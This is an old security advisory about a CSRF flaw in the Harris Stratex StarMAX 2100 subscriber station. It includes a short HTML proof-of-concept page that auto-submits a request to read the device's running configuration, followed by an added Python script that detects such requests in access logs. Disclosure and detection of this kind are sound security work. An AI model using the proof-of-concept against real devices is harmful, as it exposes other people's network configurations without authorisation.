Harris Stratex StarMAX subscriber station running config CSRF exploit

2009-11-05T00:00:00
ID SECURITYVULNS:DOC:22736
Type securityvulns
Reporter Securityvulns
Modified 2009-11-05T00:00:00

Description

=====================================================================
Harris Stratex StarMAX subscriber station running config CSRF exploit
=====================================================================


[+] Discovered By : Inj3ct0r

[+] Site : Inj3ct0r.com

[+] support e-mail : submit[at]inj3ct0r.com

I found a CSRF vulnerability in the Harris Stratex 2100 subscriber station. Using this code I am able to view the current configuration of the subscriber station without authentication from both LAN & WAN.

Product : StarMAX 2100 subscriber station
Affected Application Version : 3.0.4.1.7.C
Vendor submission : 07-04-2009
Vendor Response : No
Vulnerability : Able to view the running configuration without authentication from both LAN & WAN

<html>
<body xonload="config.submit();">
<form name="config" method="get" action="http:192.168.1.1/frameCmd6.html">
<input type="hidden" name="showRunConfig" value="Current Configuration">
</form>
</body>
</html>
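A defender-side counterpart, added here and not part of the advisory: detection logic that flags the running-config read from HTTP access logs in front of the station's web UI. It assumes Apache/nginx combined-format logs; the 192.168.1.1 management address and the sample log lines are constructed.

```python
# Added example (not from the advisory): flag requests matching the
# StarMAX running-config read, assuming combined-format access logs.
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# combined log: ip ident user [time] "METHOD path PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
DEVICE_HOSTS = {"192.168.1.1"}  # assumed management address(es) of the station

SAMPLE_LOG = [  # constructed sample lines, not real device logs
    '10.0.0.5 - - [05/Nov/2009:10:00:00 +0000] "GET /frameCmd6.html'
    '?showRunConfig=Current+Configuration HTTP/1.1" 200 5120 '
    '"http://attacker.example/page.html" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Nov/2009:10:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 800 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Nov/2009:10:02:00 +0000] "GET /frameCmd6.html'
    '?showRunConfig=Current+Configuration HTTP/1.1" 200 5120 '
    '"http://192.168.1.1/menu.html" "Mozilla/5.0"',
]

def classify(line: str) -> Optional[dict]:
    """Return a finding for a running-config read, None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["path"])
    if not (url.path.endswith("/frameCmd6.html") and "showRunConfig" in parse_qs(url.query)):
        return None
    referer = m["referer"]
    ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
    # A Referer from outside the device is the signature of a CSRF page;
    # an absent Referer is inconclusive, since browsers may strip it.
    cross_site = ref_host is not None and ref_host not in DEVICE_HOSTS
    return {
        "ip": m["ip"], "time": m["time"], "method": m["method"],
        "status": m["status"], "referer": referer, "cross_site": cross_site,
        # same-origin reads may be an admin, but the device never checked a session
        "severity": "high" if cross_site else "medium",
    }

def scan(lines: List[str]) -> List[dict]:
    """Run classify() over a whole log and keep only the findings."""
    return [f for f in (classify(ln) for ln in lines) if f is not None]
```

The check keys on the `frameCmd6.html` path and `showRunConfig` parameter from the PoC; rate-limiting or blocking that path at the proxy until the device is updated closes the same hole server-side.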

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ThE End =] Visit my proj3ct :

http://inj3ct0r.com http://inj3ct0r.org http://inj3ct0r.net

~ - [ [ : Inj3ct0r : ] ]